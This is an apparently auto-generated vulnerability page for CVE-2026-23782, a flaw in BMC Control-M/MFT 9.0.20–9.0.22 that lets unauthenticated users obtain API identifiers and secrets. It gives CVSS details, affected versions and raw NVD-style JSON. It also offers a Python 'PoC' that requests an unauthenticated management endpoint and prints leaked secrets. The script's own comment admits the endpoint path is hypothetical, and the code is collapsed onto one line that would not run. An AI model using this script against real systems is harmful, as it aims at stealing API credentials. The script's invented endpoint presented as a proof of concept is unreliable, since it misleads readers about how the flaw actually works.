Security Vulnerability Report
中文
CVE-2026-23782 CVSS 7.5 HIGH

CVE-2026-23782

Published: 2026-04-10 15:16:23
Last Modified: 2026-04-27 19:11:47
Source: [email protected]

Description

An issue was discovered in BMC Control-M/MFT 9.0.20 through 9.0.22. An API management endpoint allows unauthenticated users to obtain both an API identifier and its corresponding secret value. With these exposed secrets, an attacker could invoke privileged API operations, potentially leading to unauthorized access.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:bmc:control-m\/managed_file_transfer:*:*:*:*:*:*:*:* - VULNERABLE
BMC Control-M/MFT 9.0.20
BMC Control-M/MFT 9.0.21
BMC Control-M/MFT 9.0.22

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def exploit_cve_2026_23782(target_url): """ PoC for CVE-2026-23782: Attempts to retrieve API secrets from the exposed management endpoint. """ # Hypothetical vulnerable endpoint path based on vulnerability description vuln_endpoint = f"{target_url}/api/management/secret_exposure" headers = { "User-Agent": "CVE-2026-23782-Scanner" } try: # Sending unauthenticated request response = requests.get(vuln_endpoint, headers=headers, timeout=10) if response.status_code == 200: print("[+] Vulnerability confirmed!") print("[+] API Identifier and Secret leaked:") print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": target = "http://vulnerable-host:8080" # Replace with actual target exploit_cve_2026_23782(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-23782", "sourceIdentifier": "[email protected]", "published": "2026-04-10T15:16:23.210", "lastModified": "2026-04-27T19:11:46.547", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in BMC Control-M/MFT 9.0.20 through 9.0.22. An API management endpoint allows unauthenticated users to obtain both an API identifier and its corresponding secret value. With these exposed secrets, an attacker could invoke privileged API operations, potentially leading to unauthorized access."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:bmc:control-m\\/managed_file_transfer:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.0.20", "versionEndIncluding": "9.0.22", "matchCriteriaId": "F19C6505-D28F-4BF0-B347-789719492E0E"}]}]}], "references": [{"url": "https://docs.bmc.com/xwiki/bin/view/Control-M-Orchestration/Control-M/ctm9021/Patches/Control-M-Server-PACTV-9-0-21-308/?srid=ab0apVT3", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://www.bmc.com/support/resources/issue-defect-management.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.